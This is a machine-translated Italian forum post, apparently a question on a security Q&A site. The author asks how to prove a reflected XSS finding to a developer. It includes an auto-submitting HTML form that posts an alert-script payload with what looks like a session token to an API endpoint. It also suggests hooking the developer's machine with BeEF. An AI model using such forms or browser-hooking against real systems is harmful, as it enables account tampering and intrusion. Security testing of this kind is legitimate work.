Stavo cercando di creare un PoC di XSS:
Esempio di attacco:
Ho inserito lo script nel valore:
<html>
<body>
<form action="https://test.com/api/users.prefs.set?t=1447648400" method="POST">
<input type="hidden" name="name" value="emoji_use" />
<input type="hidden" name="value" value="<script>alert('xss')</script>" />
<input type="hidden" name="token" value="xoxs-14407185377-14407185393-14621684436-9d317bf841" />
<input type="hidden" name="_attempts" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
E sono riuscito a ottenere una risposta positiva dal browser con <script>alert('xss')</script>
. Ora il copione è stato iniettato e riflesso alla risposta, l'ho fatto notare come riflesso in XSS. Il problema è che l'avviso non viene visualizzato, quindi viene visualizzato come risposta del browser .
Ora il mio sviluppatore sostiene che dal momento che lo script non viene eseguito nel browser, quindi non è vulnerabile. Come posso fare una prova di concetto per questo?
Possibile sfruttamento a cui posso pensare di inviare un link creato allo sviluppatore con manzo e controllare la macchina per dimostrare la vulnerabilità.
Qualunque altro modo per dimostrare l'XSS riflesso o qualsiasi spiegazione possibile che convince il mio sviluppatore? Sto cercando suggerimenti dalla community, altre idee per dimostrarlo?